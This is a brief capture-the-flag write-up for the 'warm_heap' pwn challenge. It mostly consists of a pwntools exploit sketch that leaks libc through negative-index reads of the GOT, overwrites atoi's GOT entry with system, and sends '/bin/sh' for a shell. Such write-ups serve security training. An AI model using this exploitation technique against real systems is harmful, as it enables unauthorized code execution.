Tags: pwn
Rating:
No need to use UAF, since you can directly overwrite `got` entries with negative indices
See https://kileak.github.io/ctf/2017/inCTF-warm_heap/ for full exploit and explanation.
Short version:
```
add(0, 0x602020, "AAAA") # for libc leak
add(2, 0x602068, "AAAA") # for atoi overwrite
LIBCLEAK = u64(view(-12).ljust(8, "\x00"))
libc.address = LIBCLEAK - libc.symbols["puts"]
log.info("LIBC leak : %s" % hex(LIBCLEAK))
log.info("LIBC : %s" % hex(libc.address))
log.info("Overwrite atoi got with system")
edit(-10, p64(libc.symbols["system"])[:6])
log.info("Select /bin/sh to trigger shell")
r.sendline("/bin/sh")
r.interactive()
```
